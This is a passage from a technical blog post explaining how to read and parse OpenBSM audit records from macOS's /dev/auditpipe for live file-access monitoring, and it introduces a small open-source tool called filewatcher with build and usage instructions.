<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">au_read_rec</span><span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">fp</span><span class="p">,</span> <span class="n">u_char</span> <span class="o">**</span><span class="n">buf</span><span class="p">);</span></code></pre></figure>
<p>This function let us read an event record from a file descriptor and put the content in the buffer <span class="mon">buf</span> passed as parameter (which <strong>must</strong> be freed after use).
The function return the number of bytes read.</p>
<h4 id="au_fetch_tok">au_fetch_tok()</h4>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">au_fetch_tok</span><span class="p">(</span><span class="n">tokenstr_t</span> <span class="o">*</span><span class="n">tok</span><span class="p">,</span> <span class="n">u_char</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">);</span></code></pre></figure>
<p>The buffer obtained from <span class="mon">au_read_rec</span> contains tokens, every token is a struct with different information, according to the token id.
The first token of the buffer is always a <span class="mon">AUT_HEADER*</span> token: it contains a field that indicate which kind of event is on the buffer. The next tokens contains information about the path of the process that raised the event, the path of the file interested by the event and other information like the user, the timestamp…
To read the buffer with the record inside we have to fetch every token on it sequentially, using the <span class="mon">au_fetch_tok</span></p>
<h4 id="au_print_tok">au_print_tok()</h4>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">au_print_tok</span><span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">outfp</span><span class="p">,</span> <span class="n">tokenstr_t</span> <span class="o">*</span><span class="n">tok</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">del</span><span class="p">,</span> <span class="kt">char</span> <span class="n">raw</span><span class="p">,</span> <span class="kt">char</span> <span class="n">sfrm</span><span class="p">);</span></code></pre></figure>
<p>Now that we have a token, we can print it on a file descriptor.</p>
<h4 id="au_print_flags_tok">au_print_flags_tok()</h4>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">au_print_flags_tok</span><span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">outfp</span><span class="p">,</span> <span class="n">tokenstr_t</span> <span class="o">*</span><span class="n">tok</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">del</span><span class="p">,</span> <span class="kt">int</span> <span class="n">oflags</span><span class="p">);</span></code></pre></figure>
<p>Another function to print token in a fancy way is to use <span class="mon">au_print_flags_tok</span> that accepts an additional parameter to specify different output formats (XML, raw, short..).</p>
<p>A typical use of these functions could be:</p>
<ul>
<li>Open a file (usually an audit pipe) with <span class="mon">fopen()</span> and print records on a buffer from the file by calling <span class="mon">au_read_rec()</span>.</li>
<li>Read each token for each record through calls to <span class="mon">au_fetch_tok()</span> on the buffer</li>
<li>Invoke <span class="mon">au_print_flags_tok()</span> to print each token to an output stream such as stdout.</li>
<li>Free the buffer</li>
<li>Close the opened file</li>
</ul>
<p>There is only one problem I found while parsing these events with the functions provided: <span class="mon">au_print_tok()</span> and <span class="mon">au_print_flags_tok()</span> take as input a token from <span class="mon">au_fetch_tok()</span> and there is no way to parse or filter it, to have a nicer and more descriptive output of the token.
My solution was to bypass the two functions and manually parse the token to get only the most interesting properties. But how this tokens are made?
As said before, every event is made of some tokens. A token is just a C struct that contains some information according to the ID of the token.
A read event, for example, has 3 main tokens: <span class="mon">AUT_HEADER</span> , <span class="mon">AUT_SUBJECT</span> and <span class="mon">AUT_PATH</span>.<br />
<span class="mon">AUT_HEADER</span> contains information about the event. In a read event, it display that the event is actually a file read (fr).<br />
<span class="mon">AUT_SUBJECT</span> define which process raised this event while <span class="mon">AUT_PATH</span> specify which path was read by the <span class="mon">AUT_SUBJECT</span>.</p>
<p>We can manually parse the struct to print only useful information.</p>
<h2 id="the-auditpipe">The auditpipe</h2>
<p>Now that we know how to read events we need to know from where we can take real-time events.
The solution is to use a specific device called <i>auditpipe</i> and located in <i>/dev/auditpipe</i>.</p>
<p>The auditpipe is a pseudo-device for live audit event tracking that can be opened as a file and used with the 4 functions above to read and parse our real-time events.</p>
<p>In order to use the auditpipe we need to configure it with <span class="mon">ioctl</span> system calls to set up which events we want to get from the pipe.<br /></p>
<h3 id="filewatcher---a-simple-auditing-utility-for-macos">filewatcher - a simple auditing utility for macOS</h3>
<p>I wrote a small utility to monitor file or process activities using the <i>auditpipe</i> and the functions I explained.<br />
You can find it <a href="https://github.com/santoru/filewatcher" target="_blank">directly on GitHub</a><br />
To configure the <i>auditpipe</i> I used an example found <a href="https://github.com/ashish-gehani/SPADE/blob/master/src/spade/reporter/spadeOpenBSM.c" target="_blank">here</a>.<br /> To parse the token’s structure I used the open source code from <a href="https://github.com/openbsm/bsmtrace/blob/master/bsm.c" target="_blank">OpenBSM</a>.<br />
The code is still pretty messy but it works!
The options are not so much at the moment, but my goal is to improve it to have a fully-working auditing tool.
At the moment it is possible to specify which process or which file to monitor.
By default, only some events are displayed, like <strong>open/read/write/close</strong>. Anyway, it’s possible to display all events thanks to an option. Check the help message!<br />
It’s also possible, for now, to enable debug message logging into a file.</p>
<h4 id="installation">Installation</h4>
<p>At the moment, There is only a line of code inside the <i>Makefile</i> to compile the tool, so you can just <span class="mon">make</span> and it will compile inside the <i>bin</i> folder.<br />
If you want to manually compile it, you need to include the bsm library:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>gcc <span class="nt">-lbsm</span> filewatcher.c lib/<span class="k">*</span>.c <span class="nt">-o</span> bin/filewatcher
</code></pre></div></div>
<h4 id="usage">Usage</h4>
<pre class="highlight">
$ sudo ./bin/filewatcher -h
filewatcher - a simple auditing utility for macOS
Usage: ./bin/filewatcher [OPTIONS]
-f, --file Set a file to filter
-p, --process Set a process name to filter
-a, --all Display all events (By default only basic events like open/read/write are displayed)
-d, --debug Enable debugging messages to be saved into a file
-h, --help Print this help and exit
</pre>
<figure class="image">
<img class="full-width" src="/img/filewatcher/screenshotsmall.png" alt="An example of the output" />
<figcaption>
An example of the output
</figcaption>
</figure>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/santoru/filewatcher" target="_blank">filewatcher</a></li>
<li><a href="http://www.trustedbsd.org/" target="_blank">TrustedBSD</a></li>
<li><a href="https://github.com/openbsm/openbsm" target="_blank">OpenBSM - GitHub</a></li>
<li><a href="https://www.freebsd.org/cgi/man.cgi?query=auditpipe" target="_blank">Auditpipe ioctls</a></li>
<li><a href="https://objective-see.com/blog/blog_0x0F.html" target="_blank">Towards Generic Ransomware Detection</a></li>
</ul>santoruIntroduction Goal of this blog post is to explain how to use OpenBSM library to perform live audit on macOS to detect which files are open and by who. Everyday we install some program, or application, on our computer and they can basically have access to the most of files. Real-time auditing can be useful for a lot of reasons: maybe you’re just curious to see which files are opened by some applications or if some malicious process are reading your personal documents, or maybe opening your photos. Maybe you are not curious but you just want to detect possible ransom-ware activity to stop them. The scenarios are infinite. Another common scenario is that you can use real-time auditing to build and run your personal Host-Based IDS by checking modifications and accesses to sensible files.